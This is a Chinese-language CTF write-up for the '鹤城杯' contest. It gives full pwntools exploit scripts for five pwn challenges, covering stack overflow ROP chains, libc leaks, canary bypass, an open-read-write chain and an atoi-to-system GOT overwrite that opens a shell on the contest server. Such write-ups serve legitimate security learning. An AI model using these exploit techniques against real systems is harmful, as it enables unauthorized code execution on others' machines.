鹤城杯WP

Created2021-10-24Updated2021-10-09

前言

这次比赛就坑爹

一、babyof

栈溢出白给,泄露地址后直接打即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./babyof"
#libc.so = "./libc-2.24.so"
#libc.so = ""

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
rl = lambda :p.recvline()
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)  


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system")        #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''


local = 0
if local:
    p = process(binary)
    #p = process(['/glibc/2.24/64/lib/ld-linux-x86-64.so.2', './hello'], env={"LD_PRELOAD":"/glibc/2.24/64/lib/libc-2.24.so"})
    elf = ELF(binary)
    #libc = ELF(libc.so)
else:
    p = remote("182.116.62.85","29394")
    elf = ELF(binary)
    #libc = ELF(libc.so)


puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x40066B

pop_rdi_ret = 0x400743
ret = 0x400744

payload = ""
payload += "A"*(64+8)
payload += p64(pop_rdi_ret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_addr)


ru("Do you know how to do buffer overflow?\n")
sl(payload)
ru("I hope you win\n")
puts_addr = u64(rc(6).ljust(8,'\x00'))
log.info("puts_addr:0x%x"%puts_addr)

#libcsearcher use
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump('puts')
system_addr = libc_base + obj.dump("system")        #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
one_gadget = libc_base + 0x10a41c
log.info("system_addr:0x%x"%system_addr)
log.info("binsh_addr:0x%x"%binsh_addr)


payload = ""
payload += "A"*(64+8)
payload += p64(one_gadget)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += p64(main_addr)


ru("Do you know how to do buffer overflow?\n")
sl(payload)
p.interactive()

#flag{3c011eeb10d8b8256d4eeb1a700262d3}

二、littleof

栈溢出加canary,也是白给,就是不知道放个stdin file在栈上是啥意思

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./littleof"
#libc.so = "./libc-2.24.so"
#libc.so = ""

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
rl = lambda :p.recvline()
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)  


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system")        #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''


local = 0
if local:
    p = process(binary)
    #p = process(['/glibc/2.24/64/lib/ld-linux-x86-64.so.2', './hello'], env={"LD_PRELOAD":"/glibc/2.24/64/lib/libc-2.24.so"})
    elf = ELF(binary)
    #libc = ELF(libc.so)
else:
    p = remote("182.116.62.85","27056")
    elf = ELF(binary)
    #libc = ELF(libc.so)


def dbg():
    gdb.attach(p)
    pause()

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400789

pop_rdi_ret = 0x400863
ret = 0x400864

payload1 = ""
payload1 += "A"*(0x50-0x8)
payload1 += "\x01"


ru("Do you know how to do buffer overflow?\n")
sd(payload1)
ru("A"*(0x50-0x8))
canary = u64(rc(8).ljust(8,'\x00'))-0x1
log.info("canary:0x%x"%canary)

payload2 = ""
payload2 += "A"*(0x50-0x8)
payload2 += p64(canary)
payload2 += "A"*(0x8)
payload2 += p64(pop_rdi_ret)
payload2 += p64(puts_got)
payload2 += p64(puts_plt)
payload2 += p64(main_addr)
#dbg()
sd(payload2)
#pause()
ru("I hope you win\n")
puts_addr = u64(rc(6).ljust(8,'\x00'))
log.info("puts_addr:0x%x"%puts_addr)

obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump('puts')
system_addr = libc_base + obj.dump("system")        #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
one_gadget = libc_base + 0x10a41c
log.info("system_addr:0x%x"%system_addr)
log.info("binsh_addr:0x%x"%binsh_addr)



payload = ""
payload += "A"*(0x50-0x8)
payload += p64(canary)
payload += "A"*(0x8)
payload += p64(one_gadget)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += p64(main_addr)


ru("Do you know how to do buffer overflow?\n")
sl("A"*8)
ru("Try harder!")
sd(payload)
p.interactive()

#flag{3c011eeb10d8b8256d4eeb1a700262d3}

三、easyecho

利用canary的机制,检测到canary被篡改时,会打印程序的名字,而程序的名字在最开始就被放到栈上,可以通过溢出修改到该地址。然后backdoor之后,把原本指向程序名字的字符串指针,改为指向flag的指针即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./easyecho"
#libc.so = "./libc-2.24.so"
#libc.so = ""

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
rl = lambda :p.recvline()
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)  


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system")        #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''

def lg(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

local = 0
if local:
    p = process(binary)
    #p = process(['/glibc/2.24/64/lib/ld-linux-x86-64.so.2', './hello'], env={"LD_PRELOAD":"/glibc/2.24/64/lib/libc-2.24.so"})
    elf = ELF(binary)
    #libc = ELF(libc.so)
else:
    p = remote("182.116.62.85","24842")
    elf = ELF(binary)
    #libc = ELF(libc.so)

def dbg():
    gdb.attach(p)
    pause()

ru("Name: ")
sl("a"*0x10)
ru("a"*0x10)
elfbase=u64(rc(6).ljust(8,'\x00'))-0xcf0
lg('elfbase',elfbase)

ru("Input: ")
sl("backdoor")
ru("Input: ")
sl(0x2D*'PIG007NB'+p64(elfbase+0x202040))
ru("Input: ")
sl("exitexit")

p.interactive()

#flag{11dc27eed9e5277915c1dfd28992812b}

四、onecho

32位栈溢出加ORW,要么泄露栈地址,然后open打开栈上的flag指针,或者再读取,将flag字符串读取到一个可读可写的地方,这里可以选择malloc_hook或者free_hook。此外通过environ泄露栈地址,从栈上获取flag字符串指针也是可以的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'

#context
context.arch = 'i386'
SigreturnFrame(kernel = 'i386')

binary = "./onecho"
context.binary = binary
libc=ELF('/lib/i386-linux-gnu/libc-2.27.so')
#elf = ELF(binary)
context.timeout = 0.2



local = 1
if local:
    p = process(binary)
    #p = process(['/glibc/2.24/64/lib/ld-linux-x86-64.so.2', './hello'], env={"LD_PRELOAD":"/glibc/2.24/64/lib/libc-2.24.so"})
    elf = ELF(binary)
else:
    p = remote("182.116.62.85","24143")
    elf = ELF(binary)

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
rl = lambda :p.recvline()
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + '\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it      = lambda                    :p.interactive()

menu = "your choice>>"

def dockerDbg():
	myGdb = remote("127.0.0.1",30001)
	myGdb.close()
	pause()

def dbg():
	gdb.attach(p)
	pause()

def lg(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))


def add():
	p.recvuntil('Give me your choice : ')
	p.sendline('1')

main_addr = 0x0804973F
#pop ebx ; pop esi ; pop edi ; pop ebp ; ret
pop_ebx_esi_edi_ebp_ret=0x08049810
ru('Input your name:')

#leak libc
payload=0x22*'PIG007NB'
payload += p32(pop_ebx_esi_edi_ebp_ret)
payload += p32(1)*4
payload += p32(elf.plt['puts'])
payload += p32(main_addr)
payload += p32(elf.got['puts'])

sl(payload)
#debug()

puts_addr = u32(ru('\xf7')[-4:])
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr-obj.dump('puts')

lg('libc_base',libc_base)


malloc_hook_addr = libc_base + obj.dump("__malloc_hook")
free_hook_addr = libc_base + obj.dump("__free_hook")
read_addr  = libc_base + obj.dump("read")
open_addr  = libc_base + obj.dump("open")
write_addr  = libc_base + obj.dump("write")
lg('__malloc_hook',malloc_hook_addr)
lg('free_hook_addr',free_hook_addr)
lg('read_addr',read_addr)
lg('open_addr',open_addr)
lg('write_addr',write_addr)

ru('Input your name:')
payload=0x22*'PIG007NB'
payload += p32(pop_ebx_esi_edi_ebp_ret)
payload += p32(1)*4
payload += p32(read_addr)
payload += p32(main_addr)
payload += p32(0)
payload += p32(0x0804C000)
payload += p32(0x6)
sl(payload)

sl('flag\x00')

ru('Input your name:')
payload=0x22*'PIG007NB'
payload += p32(pop_ebx_esi_edi_ebp_ret)
payload += p32(1)*4
payload += p32(open_addr)
payload += p32(main_addr)
payload += p32(0x0804C000)
payload += p32(2)
sl(payload)


ru('Input your name:')
payload=0x22*'PIG007NB'
payload += p32(pop_ebx_esi_edi_ebp_ret)
payload += p32(1)*4
payload += p32(read_addr)
payload += p32(main_addr)
payload += p32(3)
payload += p32(free_hook_addr)
payload += p32(0x30)
sl(payload)


ru('Input your name:')
payload=0x22*'PIG007NB'
payload += p32(pop_ebx_esi_edi_ebp_ret)
payload += p32(1)*4
payload += p32(write_addr)
payload += p32(main_addr)
payload += p32(1)
payload += p32(free_hook_addr)
payload += p32(0x30)
sl(payload)

p.interactive()

#flag{20baa3d800326274c965041777012d12}

五、pwn1

脑瘫原题 ciscn 2018 supermarket

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'

#context
context.arch = 'i386'
SigreturnFrame(kernel = 'i386')

binary = "./task_supermarket"
context.binary = binary
libc = ELF(context.binary.libc.path)
#elf = ELF(binary)
context.timeout = 0.2



local = 0
if local:
    p = process(binary)
    #p = process(['/glibc/2.24/64/lib/ld-linux-x86-64.so.2', './hello'], env={"LD_PRELOAD":"/glibc/2.24/64/lib/libc-2.24.so"})
    elf = ELF(binary)
else:
    p = remote("182.116.62.85","27518")
    elf = ELF(binary)

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
rl = lambda :p.recvline()
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + '\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it      = lambda                    :p.interactive()

menu = 'your choice>>'

def dockerDbg():
    myGdb = remote("127.0.0.1",30001)
    myGdb.close()
    pause()

def add(index, size, content):
    sla(menu, '1')
    sla('name:', str(index))
    sla('price:', '10')
    sla('descrip_size:', str(size))
    sla('description:', content)


def delete(index):
    sla(menu, '2')
    sla('name:', str(index))


def list():
    sla(menu, '3')


def edit(index, size, content):
    sla(menu, '5')
    sla('name:', str(index))
    sla('descrip_size:', str(size))
    sla('description:',content)


atoi_got = elf.got['atoi']


add(0, 0x80, 'PIG007NB' * 2)
add(1, 0x20, 'PIG007NB' * 2)
edit(0, 0x90, '')
add(2, 0x20, 'PIG007NB' * 2)
payload = ""
#payload += '2'.ljust(16,'\x00')
payload += p64(0x32)
payload += p64(0x0)
#--------------------------
payload += p32(20)
payload += p32(0x20)
payload += p32(atoi_got)

edit(0, 0x80, payload)
list()
ru('2: price.20, des.')

atoi_addr = u32(rc(4).ljust(4,'\x00'))
obj = LibcSearcher('atoi', atoi_addr)
libc_base = atoi_addr - obj.dump('atoi')
system_addr = libc_base + obj.dump('system')
edit(2, 0x20, p32(system_addr))
sla(menu, '/bin/sh')

p.interactive()
#flag{03b1baaab2a949db11f8b1c02a4f7ab6}